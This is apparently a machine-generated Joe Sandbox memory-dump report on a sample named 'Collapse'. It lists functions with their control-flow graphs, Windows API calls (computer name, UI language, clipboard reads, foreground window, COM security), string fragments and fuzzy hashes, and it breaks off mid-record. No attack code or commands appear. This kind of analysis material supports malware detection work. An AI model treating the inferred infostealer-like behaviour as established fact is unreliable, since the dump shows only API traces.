                                                                                                        control_flow_graph 934 42c04d-42dc54 call 43f940 938 42dc60-42dc9b 934->938 938->938 939 42dc9d-42dca2 938->939 940 42dca4-42dca5 939->940 941 42dcbb-42dcf9 GetComputerNameExA 939->941 942 42dcb0-42dcb9 940->942 942->941 942->942
                                                                                                        APIs
                                                                                                        • GetComputerNameExA.KERNELBASE(00000006,?,?), ref: 0042DCD0
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000006.00000002.1688715530.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_6_2_400000_Collapse.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ComputerName
                                                                                                        • String ID: 4"c$=\5L
                                                                                                        • API String ID: 3545744682-2031509168
                                                                                                        • Opcode ID: c55048f07ef31538b9a2baa572c2c505415656f19f2100f233e48fb0a8608c5c
                                                                                                        • Instruction ID: 2e8b8599f79e335cf919de20d570e3b8fd45cb10d68f9f43c6aa7e89891f6a16
                                                                                                        • Opcode Fuzzy Hash: c55048f07ef31538b9a2baa572c2c505415656f19f2100f233e48fb0a8608c5c
                                                                                                        • Instruction Fuzzy Hash: 442133396016118FE315CF25CC80A2277A3FFC6310B59C0ADD4868B765CB79E802CB40

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 1099 4367c7-43680d call 413d90 * 3 call 43f940 GetUserDefaultUILanguage 1108 43680f-436812 1099->1108 1109 436814-43683d 1108->1109 1110 43683f-436868 1108->1110 1109->1108
                                                                                                        APIs
                                                                                                        • GetUserDefaultUILanguage.KERNELBASE ref: 004367F6
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000006.00000002.1688715530.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_6_2_400000_Collapse.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: DefaultLanguageUser
                                                                                                        • String ID: O
                                                                                                        • API String ID: 95929093-1565894260
                                                                                                        • Opcode ID: 7616a595526bafa3687f96e99e0534a833ac6c132625a1b12df8f9f0694abd48
                                                                                                        • Instruction ID: 11def839418fd5d686b5f591c2ee6643e49fceff057299cf769fe895b6b669d2
                                                                                                        • Opcode Fuzzy Hash: 7616a595526bafa3687f96e99e0534a833ac6c132625a1b12df8f9f0694abd48
                                                                                                        • Instruction Fuzzy Hash: F901D6769001028BDB04AF79D9152AEB7A3BFD8311F29C57DD80157319D7389542C756

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 1111 40c846-40c9d6 CoInitializeEx * 2
                                                                                                        APIs
                                                                                                        • CoInitializeEx.OLE32(00000000,00000002), ref: 0040C84A
                                                                                                        • CoInitializeEx.COMBASE(00000000,00000002), ref: 0040C995
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000006.00000002.1688715530.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_6_2_400000_Collapse.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Initialize
                                                                                                        • String ID:
                                                                                                        • API String ID: 2538663250-0
                                                                                                        • Opcode ID: 33b9f3f75c944a81cb14bf5bc3ef0b3239042d20b42293b3aa2c6582cb5774df
                                                                                                        • Instruction ID: 11e91efd5d4a476de7439511b11a1cf4b6fad113809ff6bef81543a0c430e8d1
                                                                                                        • Opcode Fuzzy Hash: 33b9f3f75c944a81cb14bf5bc3ef0b3239042d20b42293b3aa2c6582cb5774df
                                                                                                        • Instruction Fuzzy Hash: 5641F9B5D10B00AFD370EF3DDA4B7127EB4AB05250F40872DF9E68A6D4E630A4198BD6
                                                                                                        APIs
                                                                                                        • RtlReAllocateHeap.NTDLL(?,00000000), ref: 0043E0A6
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000006.00000002.1688715530.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_6_2_400000_Collapse.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: AllocateHeap
                                                                                                        • String ID:
                                                                                                        • API String ID: 1279760036-0
                                                                                                        • Opcode ID: 71dc51ca2d6fc07a2931c77ea297b4b54f03fc9e93f09199e39f5efe2c1ae787
                                                                                                        • Instruction ID: fec0c123637ed751c7014e425ce955774d5f5479ead2028489dbbb7dd98cc405
                                                                                                        • Opcode Fuzzy Hash: 71dc51ca2d6fc07a2931c77ea297b4b54f03fc9e93f09199e39f5efe2c1ae787
                                                                                                        • Instruction Fuzzy Hash: ADF0F07A824210FBC6012F29BD0194B3674EF8B329F05187AF00052022EB39C802EBAA
                                                                                                        APIs
                                                                                                        • GetForegroundWindow.USER32 ref: 0043E275
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000006.00000002.1688715530.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_6_2_400000_Collapse.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ForegroundWindow
                                                                                                        • String ID:
                                                                                                        • API String ID: 2020703349-0
                                                                                                        • Opcode ID: 6cb32618bc487382298e5b6f1fc3e7adf649a3ed36cba32df02c21826e090ae5
                                                                                                        • Instruction ID: 9ddbf6b16d43b63eaacfaa2c81d09df84929580d8ee5ee5cfd18515a6355f7fe
                                                                                                        • Opcode Fuzzy Hash: 6cb32618bc487382298e5b6f1fc3e7adf649a3ed36cba32df02c21826e090ae5
                                                                                                        • Instruction Fuzzy Hash: 24F0F6B6A061604BD7088F29D90535773E0AB8A305F005839E546D33A1D53A8D44C34A
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000006.00000002.1688715530.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_6_2_400000_Collapse.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: BlanketProxy
                                                                                                        • String ID:
                                                                                                        • API String ID: 3890896728-0
                                                                                                        • Opcode ID: bd91b47e3060ad55cf2fe4b042bfb56b19f806254a51f7806ddc3c1a1fe9ff79
                                                                                                        • Instruction ID: 99560750887db020c88b0009a58cd09569da982514c7974981007fb546798a58
                                                                                                        • Opcode Fuzzy Hash: bd91b47e3060ad55cf2fe4b042bfb56b19f806254a51f7806ddc3c1a1fe9ff79
                                                                                                        • Instruction Fuzzy Hash: 30F0DAB4109701CFD314DF28D5A471ABBF0FB89704F10881CE1968B3A0CB75AA48CF82
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000006.00000002.1688715530.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_6_2_400000_Collapse.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: BlanketProxy
                                                                                                        • String ID:
                                                                                                        • API String ID: 3890896728-0
                                                                                                        • Opcode ID: 56f13f92b7a1255e101520ede486534905b2a37b1a9ed86f7e4f59851042d4ca
                                                                                                        • Instruction ID: 62b65a42f15d7cc2309a1e08c51f1bcdbc725ecad25909c5d2c23be4bac06d58
                                                                                                        • Opcode Fuzzy Hash: 56f13f92b7a1255e101520ede486534905b2a37b1a9ed86f7e4f59851042d4ca
                                                                                                        • Instruction Fuzzy Hash: 0CF07FB45093429FE318DF25D5A871FBBE1BBC9308F60C91CE0944B694C3B59A098FC2
                                                                                                        APIs
                                                                                                        • CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 0040CA0F
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000006.00000002.1688715530.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_6_2_400000_Collapse.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: InitializeSecurity
                                                                                                        • String ID:
                                                                                                        • API String ID: 640775948-0
                                                                                                        • Opcode ID: 0cf74e8c4fa9b9cebf6749d4c54df742595b7de921fd658c64fc65029d3aeeff
                                                                                                        • Instruction ID: ed5a73b1c9677f79df57209a6001f27ef0f41a1ff87bfd8a32e0076880d6d603
                                                                                                        • Opcode Fuzzy Hash: 0cf74e8c4fa9b9cebf6749d4c54df742595b7de921fd658c64fc65029d3aeeff
                                                                                                        • Instruction Fuzzy Hash: 4FD092783E47417BF6645B08AC17F107610A746F22F300224B362EE2D2C9907501861C
                                                                                                        APIs
                                                                                                        • RtlFreeHeap.NTDLL(?,00000000,?,0043E098,?,?,00000000,0040B30C,00000000,0040B333), ref: 0043C1FE
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000006.00000002.1688715530.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_6_2_400000_Collapse.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: FreeHeap
                                                                                                        • String ID:
                                                                                                        • API String ID: 3298025750-0
                                                                                                        • Opcode ID: 161d6cc876b25b1b36f87deb656d717efb24626576a8b71b331aa942640a628b
                                                                                                        • Instruction ID: 4d879e3e48c6dc2181385bdab1c4d598bb94be339152225f8128b242698bd753
                                                                                                        • Opcode Fuzzy Hash: 161d6cc876b25b1b36f87deb656d717efb24626576a8b71b331aa942640a628b
                                                                                                        • Instruction Fuzzy Hash: 63D01232415232FBC6111F28FC06B9B3A54DF0A321F0308B6B4406B071D674DC91D6D8
                                                                                                        APIs
                                                                                                        • RtlAllocateHeap.NTDLL(?,00000000,?,00000001,00408819,556D4AF4), ref: 0043C1D0
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000006.00000002.1688715530.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_6_2_400000_Collapse.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: AllocateHeap
                                                                                                        • String ID:
                                                                                                        • API String ID: 1279760036-0
                                                                                                        • Opcode ID: b70c299dbf8ad026ff3d646b08906a76d3bb47b7d5cd047be35dc264748042f0
                                                                                                        • Instruction ID: f06daee52db04fef9ffd77a93bf39f1218852508e2b390a71e91873d75b177fd
                                                                                                        • Opcode Fuzzy Hash: b70c299dbf8ad026ff3d646b08906a76d3bb47b7d5cd047be35dc264748042f0
                                                                                                        • Instruction Fuzzy Hash: 12C09B31455230BBC6102F15FC05FCA3F54EF56355F4550A7B04467072C760AC82C6D8
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000006.00000002.1688715530.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_6_2_400000_Collapse.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: w$"2&$(`"w$+d4v$/t$;,gk$;d$v$=t2c$tk
                                                                                                        • API String ID: 0-929208450
                                                                                                        • Opcode ID: 6fe4a89783577b8b8dc71a87290f0745d8695e541a1e71c7b3b54c067a0c1ff1
                                                                                                        • Instruction ID: 57b87d57f3c9de9105bea4e881d15640b7cf8e54a8238bdd52f6ede7f2aa1e3f
                                                                                                        • Opcode Fuzzy Hash: 6fe4a89783577b8b8dc71a87290f0745d8695e541a1e71c7b3b54c067a0c1ff1
                                                                                                        • Instruction Fuzzy Hash: 444279B490C3908FC321DF25C8507AFBBE1AF95314F14866DE8E55B392D73A8945CB8A
                                                                                                        APIs
                                                                                                        • RtlExpandEnvironmentStrings.NTDLL ref: 0041100D
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000006.00000002.1688715530.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_6_2_400000_Collapse.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: EnvironmentExpandStrings
                                                                                                        • String ID: #o$#$Vh$q6$qi
                                                                                                        • API String ID: 237503144-3610294576
                                                                                                        • Opcode ID: 24bdf68054bc932f38a150c690828f4dcff0b4b26ec284e7472666cb6aaeadb5
                                                                                                        • Instruction ID: 8b034082395f838573e0f9c1b77793219c578cee44d2a0a158306dbafd125d5e
                                                                                                        • Opcode Fuzzy Hash: 24bdf68054bc932f38a150c690828f4dcff0b4b26ec284e7472666cb6aaeadb5
                                                                                                        • Instruction Fuzzy Hash: 3712A171A1D3408BC3249F79C4853EEB7E1AFC8314F15892FE9D997391DA7889818B4B
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000006.00000002.1688715530.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_6_2_400000_Collapse.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Clipboard$Global$CloseDataLockOpenUnlock
                                                                                                        • String ID:
                                                                                                        • API String ID: 1006321803-0
                                                                                                        • Opcode ID: 23d8670c13223ac8d427bdc199c3b0764472a9e89a818100f6a68e5cbb47d912
                                                                                                        • Instruction ID: 07fa625490295a4e76969198190a3f4785a56c74a67cc5372c365e7d5e2a77eb
                                                                                                        • Opcode Fuzzy Hash: 23d8670c13223ac8d427bdc199c3b0764472a9e89a818100f6a68e5cbb47d912
                                                                                                        • Instruction Fuzzy Hash: DD41B2B2D086119FD710AFB4D48626EBBB0BF44301F05853ED8859B341D7789A89C7DB
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000006.00000002.1688715530.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_6_2_400000_Collapse.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: !{~{$#{ {$$SB$-{"{$/{,{$/{,{
                                                                                                        • API String ID: 0-1771253900
                                                                                                        • Opcode ID: 7bebbd97323a1261463950372c1b97b88e21cd78cba162f4dc5dc500385f8341
                                                                                                        • Instruction ID: f72d43909fc2cb886aae9656cee39960dfeaccfc7b1c9dd6433920021e8c23de
                                                                                                        • Opcode Fuzzy Hash: 7bebbd97323a1261463950372c1b97b88e21cd78cba162f4dc5dc500385f8341
                                                                                                        • Instruction Fuzzy Hash: EB41203861A310CBC7249F60E86167BB3F1FFC6341FA5186DE58297360E7788850CB4A
                                                                                                        APIs
                                                                                                        • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,00000000,?), ref: 00423065
                                                                                                        • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,?,?), ref: 004230EA
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000006.00000002.1688715530.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_6_2_400000_Collapse.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: EnvironmentExpandStrings
                                                                                                        • String ID: Pbx1$obx1
                                                                                                        • API String ID: 237503144-3160095297
                                                                                                        • Opcode ID: 5106aa6e973730c3b83cd0979d0ce10b40904b4194778254b7e470db64bab909
                                                                                                        • Instruction ID: 2d043df027a7d3965e94ad614ed74330e79769a2ec18d521d99abd520c407aeb
                                                                                                        • Opcode Fuzzy Hash: 5106aa6e973730c3b83cd0979d0ce10b40904b4194778254b7e470db64bab909
                                                                                                        • Instruction Fuzzy Hash: B881007565C311AFE320CF60EC81B1BB7E4FBC5704F11892DFA946B290D7B499068B86
                                                                                                        APIs
                                                                                                          • Part of subcall function 0043E0F0: LdrInitializeThunk.NTDLL(004412BD,?,00000018,?,?,00000018,?,?,?), ref: 0043E11E
                                                                                                        • FreeLibrary.KERNEL32(?), ref: 0041996A
                                                                                                        • FreeLibrary.KERNEL32(?), ref: 00419A1B
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000006.00000002.1688715530.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_6_2_400000_Collapse.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: FreeLibrary$InitializeThunk
                                                                                                        • String ID: +4
                                                                                                        • API String ID: 764372645-371006243
                                                                                                        • Opcode ID: 3301f3774f5d48760759db29dae918f8e9cf7fcd14da139f1d661ed454fde207
                                                                                                        • Instruction ID: e567363f145b97950688bf2fb24687bf24cae1b5c1e056b29fc721f4ee7eab79
                                                                                                        • Opcode Fuzzy Hash: 3301f3774f5d48760759db29dae918f8e9cf7fcd14da139f1d661ed454fde207
                                                                                                        • Instruction Fuzzy Hash: 2FB27876A463105BE710CF64CD803ABB3E2ABD4304F1AC42DE98597391E7BD9C95CB86
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000006.00000002.1688715530.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_6_2_400000_Collapse.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: Z{V$Z{V$g{V$g{V
                                                                                                        • API String ID: 0-4205598400
                                                                                                        • Opcode ID: 791a6db6d37bca967a7d8775af97a9ff635258d7e804846fcbed0c4246788259
                                                                                                        • Instruction ID: 2735a1024a3d6ab3e679d68841893f3a8e932053e0ba995e88a79267ffb60799
                                                                                                        • Opcode Fuzzy Hash: 791a6db6d37bca967a7d8775af97a9ff635258d7e804846fcbed0c4246788259
                                                                                                        • Instruction Fuzzy Hash: E2816872D04300ABE308DF29DC4272BB6E2EFE5309F15953ED88DA7322E7788455875A
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000006.00000002.1688715530.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_6_2_400000_Collapse.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: 64$B8$ro$~f
                                                                                                        • API String ID: 0-3005907464
                                                                                                        • Opcode ID: 67815121782669229ad639897576599399b8a1b1fb1bb0a6c3ef3cab52bda6e9
                                                                                                        • Instruction ID: f77cf1fb63027d9000466c16fe93f40d09de28bfb3c593ed1783a49cb2f31834
                                                                                                        • Opcode Fuzzy Hash: 67815121782669229ad639897576599399b8a1b1fb1bb0a6c3ef3cab52bda6e9
                                                                                                        • Instruction Fuzzy Hash: 0851E52651C3A186C7149B38850505FE7E2AFD9320F28AD2EF8E597764EA39C843C35B
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000006.00000002.1688715530.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_6_2_400000_Collapse.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: cc$L4$L4
                                                                                                        • API String ID: 0-2811325430
                                                                                                        • Opcode ID: 7d62c9bf4bf14ae5ebb66ecd520c370ab74c84cd16f4799bf9f81593496fd45d
                                                                                                        • Instruction ID: bcc7170a97565d77c4348bff3c6b942111de8cda2cf3e40afdd33485117747e3
                                                                                                        • Opcode Fuzzy Hash: 7d62c9bf4bf14ae5ebb66ecd520c370ab74c84cd16f4799bf9f81593496fd45d
                                                                                                        • Instruction Fuzzy Hash: FC423476A083519BD724CF24C8547AFB3E2FFC5304F15892EE88997391EB399845CB86
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000006.00000002.1688715530.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_6_2_400000_Collapse.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: 4w$sub
                                                                                                        • API String ID: 0-3989355360
                                                                                                        • Opcode ID: 49237ceb415039d448eff18524d38ad99e91b372b50cd8c51f520d07d13edde3
                                                                                                        • Instruction ID: fb506ad9777267d5baf7ad5e03968dedae21db2d769d98f9343bedbe223205fe
                                                                                                        • Opcode Fuzzy Hash: 49237ceb415039d448eff18524d38ad99e91b372b50cd8c51f520d07d13edde3
                                                                                                        • Instruction Fuzzy Hash: 61027C71A082618BC7149F28D85136BB7E2EF85304F49487FE8C997382D63DDD45CB9A
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000006.00000002.1688715530.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_6_2_400000_Collapse.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: :$X w
                                                                                                        • API String ID: 0-1300669176
                                                                                                        • Opcode ID: da439eb0edf64d587349cd665ca4562f53eb16d7733249cc7a6b1eb03273180c
                                                                                                        • Instruction ID: 5ded977b00c1926fc7bc06d4f9b45fa2cffaf300d00cc5cfff9bfe83dc4de463
                                                                                                        • Opcode Fuzzy Hash: da439eb0edf64d587349cd665ca4562f53eb16d7733249cc7a6b1eb03273180c
                                                                                                        • Instruction Fuzzy Hash: 70D1D43A628311CBCB189F38D8512AB73F1FF4A755F0A887DD9814B2A0E73A8D61D715
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000006.00000002.1688715530.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_6_2_400000_Collapse.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: 4/$>:
                                                                                                        • API String ID: 0-3529472704
                                                                                                        • Opcode ID: 821f3d929cc9ec9ff969c50021c4a1541ab36428585dd371a4b593deff11f8fc
                                                                                                        • Instruction ID: 8b1a751cfb05d5f152768d7c29b6ea9f203b357cb662e081bdd6b6ddfd1c81bd
                                                                                                        • Opcode Fuzzy Hash: 821f3d929cc9ec9ff969c50021c4a1541ab36428585dd371a4b593deff11f8fc
                                                                                                        • Instruction Fuzzy Hash: E7B1E77250C79197D325CF29C85076BFBE0EF96304F09596EE8C5AB382D2398D06C79A
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000006.00000002.1688715530.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_6_2_400000_Collapse.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: C<X<$V<V<
                                                                                                        • API String ID: 0-2217627203
                                                                                                        • Opcode ID: 6fdfba9d35220f6eb72d435abaee4269093627fe2cbc792f237b65be4f121c62
                                                                                                        • Instruction ID: d7075f50ca02dd5208c2294db79d2b3416935b123847e84921d14f1daebbff4d
                                                                                                        • Opcode Fuzzy Hash: 6fdfba9d35220f6eb72d435abaee4269093627fe2cbc792f237b65be4f121c62
                                                                                                        • Instruction Fuzzy Hash: 958123B17043109BD720EF20DC82B6B73A5EFA1358F54452DE9898B3A0E779E904C76A
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000006.00000002.1688715530.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_6_2_400000_Collapse.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: ,V^${f}^
                                                                                                        • API String ID: 0-1595990451
                                                                                                        • Opcode ID: 3b9a1f8e9a04661860723fee800bef90dc1aa205d70ae4e221e6d8bcb30e85a8
                                                                                                        • Instruction ID: cfb5c7e8e4236475c6a0308872e5c117798408d73ac891a23abfac3428d40e75
                                                                                                        • Opcode Fuzzy Hash: 3b9a1f8e9a04661860723fee800bef90dc1aa205d70ae4e221e6d8bcb30e85a8
                                                                                                        • Instruction Fuzzy Hash: C24167715142428FD3158F29D4506B6F7E2FF9A310F6944ADC0C6DB363CB35A812CB98
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000006.00000002.1688715530.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_6_2_400000_Collapse.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: D]+\
                                                                                                        • API String ID: 0-1174097187
                                                                                                        • Opcode ID: 1a9254611d98cb9692bd3a4c8e51cbb30cb74b38d5dde627dce16751d1310c2a
                                                                                                        • Instruction ID: 7004b2878cd400f1de1fa292433d6f081f3da8a2972005a462f6adbce4c46a78
                                                                                                        • Opcode Fuzzy Hash: 1a9254611d98cb9692bd3a4c8e51cbb30cb74b38d5dde627dce16751d1310c2a
                                                                                                        • Instruction Fuzzy Hash: CF3252B56043019BDB14CF28DC42B6B73A1FFC6329F04462DF995872E2E778A895C74A
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000006.00000002.1688715530.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_6_2_400000_Collapse.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: 66
                                                                                                        • API String ID: 0-3205838671
                                                                                                        • Opcode ID: 3a4d689b5adf689f7e773fabaa029fd38597a9d7bedb459be3e582fb5524401a
                                                                                                        • Instruction ID: 9fe8fbb1db8033f3c1f89b903ab653d0fea1255b9a6616099de0bb8dbe5f3607
                                                                                                        • Opcode Fuzzy Hash: 3a4d689b5adf689f7e773fabaa029fd38597a9d7bedb459be3e582fb5524401a
                                                                                                        • Instruction Fuzzy Hash: 24E115B59093508BD7209F14DC457ABB3E1FFC6314F04492EE9899B391E7389841CB9B
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000006.00000002.1688715530.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_6_2_400000_Collapse.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: "
                                                                                                        • API String ID: 0-123907689
                                                                                                        • Opcode ID: 0ca39e861fa632e47d5f6bce64f6f17302d4ac7f6a551dceb9a0f9bf01575074
                                                                                                        • Instruction ID: f5867da1ea70d0d101c915f774d8f20d3652d628c40eff7af88a76f5ab517ec6
                                                                                                        • Opcode Fuzzy Hash: 0ca39e861fa632e47d5f6bce64f6f17302d4ac7f6a551dceb9a0f9bf01575074
                                                                                                        • Instruction Fuzzy Hash: B6C113B1B082205FD7148E26E45076BB7D6AF84354F89892FEC958B382D738EC54C787
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000006.00000002.1688715530.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_6_2_400000_Collapse.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: vA
                                                                                                        • API String ID: 0-2626632682
                                                                                                        • Opcode ID: ebcf7cf2aeedbb24a8c659c7d4582e31529fad8f0b1c1028a6d108a1d64021b8
                                                                                                        • Instruction ID: 61edbe3d95db78a7c36f43a47597acbbf32b880cf722f3ac2fbffe32f33ea027
                                                                                                        • Opcode Fuzzy Hash: ebcf7cf2aeedbb24a8c659c7d4582e31529fad8f0b1c1028a6d108a1d64021b8
                                                                                                        • Instruction Fuzzy Hash: CE91F571A1D3109BC324DF28C4516ABB7F2EFD5350F04992EE8C59B391EB389941CB9A
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000006.00000002.1688715530.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_6_2_400000_Collapse.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: dVB
                                                                                                        • API String ID: 0-3299631232
                                                                                                        • Opcode ID: 4afb3a0be42bc4e84ee4da61528e2b8b1700afdb80440233dbd69cf79bf1f5e7
                                                                                                        • Instruction ID: a97b9f0ef3ad75d7b6603331337a6a56183422bbfce358318dfd7cf009b5dbc9
